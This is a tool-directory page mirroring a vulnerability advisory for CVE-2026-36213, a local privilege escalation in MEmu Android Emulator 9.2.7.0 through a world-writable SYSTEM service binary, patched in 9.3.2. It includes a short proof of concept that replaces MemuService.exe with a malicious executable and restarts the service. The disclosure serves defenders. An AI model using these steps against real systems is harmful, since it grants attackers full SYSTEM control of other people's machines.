Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-36213 — CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2 | Kitploit
Tools/GitHubGitHub/sec-zone/cve-2026-36213
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubsec-zone/cve-2026-36213

CVE-2026-36213

CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2

View Repository
512 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-36213

CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2

CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE

CVE CVSS Status Platform

Summary

A Local Privilege Escalation (LPE) vulnerability in MEmu Android Emulator 9.2.7.0.
The service MEmuSVC runs as NT AUTHORITY\SYSTEM while its binary is writable by any local user, allowing full system compromise.

FieldDetails
CVECVE-2026-36213
ProductMEmu Android Emulator (MicroVirt)
Affected Version9.2.7.0 and earlier
Fixed Version9.3.2
CWECWE-732 / CWE-269
CVSS v3.17.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ATT&CKT1574.010

Vulnerability

MEmuService.exe is installed as a SYSTEM-level Windows service with insecure NTFS permissions:

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

BUILTIN\Users:(F)   ← Any local user has Full Control
Everyone:(F)        ← World-writable binar

Proof of Concept

:: Step 1 - Verify vulnerable permissions

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

:: Step 2 - Replace binary (as low-priv user)

root@kitploit:~
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y

:: Step 3 - Restart service

root@kitploit:~
sc stop MEmuSVC && sc start MEmuSVC

:: Result: malicious.exe runs as NT AUTHORITY\SYSTEM

Detection Script

Available at: https://github.com/sec-zone/Hijack-service-binaries

Disclaimer

This research was conducted for educational purposes under responsible disclosure policy.
The author is not responsible for any misuse of this information.

Researcher

Name: Mohammad Hossein Ashofte Yazdi
Linkedin: https://www.linkedin.com/in/seczone64
Twitter: @sec_zone64
Email: [email protected]

Download Tool